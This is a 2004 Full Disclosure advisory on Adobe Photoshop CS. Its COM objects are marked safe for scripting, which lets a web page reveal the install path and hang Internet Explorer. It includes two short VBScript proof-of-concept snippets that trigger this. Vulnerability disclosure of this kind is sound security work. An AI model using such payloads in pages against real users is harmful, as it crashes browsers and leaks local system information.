Full Disclosure mailing list archives
Adobe Photoshop 8.0 (CS) - Local Path Disclosure and causing I.E D.O.S
From: "Rafel Ivgi, The-Insider" <theinsider () 012 net il>
Date: Tue, 6 Apr 2004 18:46:58 +0200
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application: Adobe Photoshop Vendors: http://www.adobe.com Version: 8.0 (CS) Platforms: Windows Bug: Local Path Disclosure and D.O.S Risk: Medium - Denial Of Service Exploitation: Remote with browser Date: 1 Apr 2004 Author: Rafel Ivgi, The-Insider e-mail: the_insider () mail com web: http://theinsider.deep-ice.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1) Introduction 2) Bugs 3) The Code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============== 1) Introduction =============== Adobe Photoshop is one of the worlds best graphic editors. It has a great set of tools, layer combinations, brushes, amazing software. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ====== 2) Bug ======Adobe Photoshop registers a lot of COM objects(such as "Photoshop.Application.8"
and "Photoshop.PhotoCDOpenOptions.8"). These objects are marked as "safe"for scripting. Therefore they can be created remotely(which is the root of the problem - they should not!).
Unfortunatly , adobe did not design their object correctly, because upon any remote creation of a Photoshop Object a message pops up saying adobe photoshop security caught "potential tampering with photoshop", however it also reveals the local path of which photoshop was installed in and the Internet Explorer window stops responding(D.O.S).
For Example: <script language=vbscript> Dim cooler Set cooler = CreateObject("Photoshop.Application.8" ) </script> Will show where photoshop is installed and that Internet Explorer window stops responding(D.O.S). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =========== 3) The Code =========== This is Proof Of Concept Code: ------------------- CUT HERE ------------------- <script language=vbscript> Dim cooler Set cooler = CreateObject("Photoshop.Application.8" ) </script> ------------------- CUT HERE ------------------- Or ------------------- CUT HERE ------------------- <script language=vbscript> dim cooler Set cooler = CreateObject("Photoshop.PhotoCDOpenOptions.8" ) </script> ------------------- CUT HERE ------------------- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~--- Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com"Only the one who sees the invisible , Can do the Impossible."
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Adobe Photoshop 8.0 (CS) - Local Path Disclosure and causing I.E D.O.S Rafel Ivgi, The-Insider (Apr 06)